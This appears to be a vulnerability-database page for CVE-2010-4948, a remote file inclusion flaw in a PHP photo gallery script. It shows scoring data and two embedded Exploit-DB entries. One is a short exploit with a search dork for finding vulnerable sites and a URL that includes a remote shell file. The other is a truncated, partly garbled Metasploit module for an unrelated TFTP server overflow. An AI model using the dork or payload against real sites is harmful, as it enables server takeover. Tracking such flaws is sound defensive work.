CVE-2010-4948
published 2011-10-09CVE-2010-4948: PHP remote file inclusion vulnerability in libs/adodb/adodb.inc.php in PHP Free Photo Gallery script allows remote attackers to execute arbitrary PHP code via…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.10%
79.3th percentile
PHP remote file inclusion vulnerability in libs/adodb/adodb.inc.php in PHP Free Photo Gallery script allows remote attackers to execute arbitrary PHP code via a URL in the path parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Free PHP Photo Gallery Script - Remote File Inclusion
exploitdb·2010-07-22
CVE-2010-4948 Free PHP Photo Gallery Script - Remote File Inclusion
Free PHP Photo Gallery Script - Remote File Inclusion
---
# Exploit Title: Free PHP photo gallery script Remote File inclusion
Vulnerability
# Date: 2010/07/21
# Author: ViRuS Qalaa
# Email: [email protected]
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script: http://phpweby.com/downloads/gallery
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: [email protected]
:::::::::::::::::::::::::
Iam ViRuS Qalaa Frome Iraq Hackers
=================Exploit=================
-=[ vuln c0de ]=-
include_once($path);
/jadro/libs/adodb/adodb.inc.php
Line:4227
----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"
http://{localhost}/{path}/jadro/libs/adodb/adodb.inc.php?path=shell.txt?
Exploit-DB
ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-4948 ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
---
##
# $Id: tftpdwin_long_filename.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',
'Description' => %q{
This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending
an overly long file name to the tftpd.exe server, the stack can be overwritten.
},
'Author' => [ 'patrick' ],
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-4948' ],
[ 'O
No writeups or analysis indexed.
2011-10-09
Published